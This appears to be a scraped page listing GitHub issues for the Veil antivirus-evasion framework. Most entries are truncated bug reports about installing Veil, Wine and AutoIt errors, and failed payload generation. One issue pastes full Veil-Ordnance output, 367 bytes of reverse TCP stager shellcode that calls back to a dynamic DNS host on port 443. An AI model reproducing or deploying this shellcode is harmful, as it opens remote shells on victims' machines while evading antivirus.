Veil icon indicating copy to clipboard operation
Veil copied to clipboard

Veil 3.1.X (Check version info in Veil at runtime)

Results 79 Veil issues
Sort by recently updated
recently updated
newest added

## Veil version 3.1.14 ## OS Used - all info (architecture, linux flavor, etc) UBUNTU 22.04 ## How did you install Veil? (Apt, Clone from Github, etc.) Github ## Did...

When I try to generate a reverse http payload with python/shellcode_inject/aes_encrypt it takes all the LHOST,LPORT inputs but when I generate the payload it shows these python errors and closes...

![veil](https://user-images.githubusercontent.com/97535534/177035677-ad4c1e46-6ccc-4455-a5e5-a5736e59dd76.png) I am facing such a problem please help sudo apt-get -y install git git clone https://github.com/Veil-Framework/Veil.git cd Veil/ ./config/setup.sh --force --silent this is how i uploaded it

## Veil version ## OS Used - all info (architecture, linux flavor, etc) ## How did you install Veil? (Apt, Clone from Github, etc.) ## Did you run the setup...

## Veil version 3.1.14 ## OS Used - all info (architecture, linux flavor, etc) Kali Linux 2021.1 ## How did you install Veil? (Apt, Clone from Github, etc.) Github ##...

`0039:err:msiexec:custom_action_server Failed to create custom action server pipe: 2` how can i solve this error?

[*] Payload Name: Reverse TCP DNS Stager (Stage 1) [*] IP Address: yunuscan4949.duckdns.org [*] Port: 443 [*] Shellcode Size: 367 \xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\xeb\x2f\x68\xa9\x28\x34\x80\xff\xd5\x8b\x40\x1c\x6a\x09\x50\x68\x02\x00\x01\xbb\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x51\xff\x4e\x08\x75\xec\x68\xf0\xb5\xa2\x56\xff\xd5\xe8\xcc\xff\xff\xff\x79\x75\x6e\x75\x73\x63\x61\x6e\x34\x39\x34\x39\x2e\x64\x75\x63\x6b\x64\x6e\x73\x2e\x6f\x72\x67\x00\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x01\xc3\x29\xc6\x85\xf6\x75\xec\xc3 Half way... Shellcode generated with Veil-Ordnance! Returning to Veil-Evasion....

## Veil version - 3.1.6 ## OS Used - all info (architecture, linux flavor, etc) -Distributor ID: Kali -Description: Kali GNU/Linux Rolling -Release: 2022.2 -Codename: kali-rolling - Architecture : x64...

## Veil version newst ## OS Used - Ubuntu ## How did you install Veil? Github ## msfconsole command wont work

i install veil by APT and after all instalations i have this message : [!] ERROR #2-3: Can't find the WINE profile for AuotIT v3 (/var/lib/veil/wine//drive_c/Program Files/AutoIt3/Aut2Exe/Aut2exe.exe). Run: /usr/share/veil/config/setup.sh --force...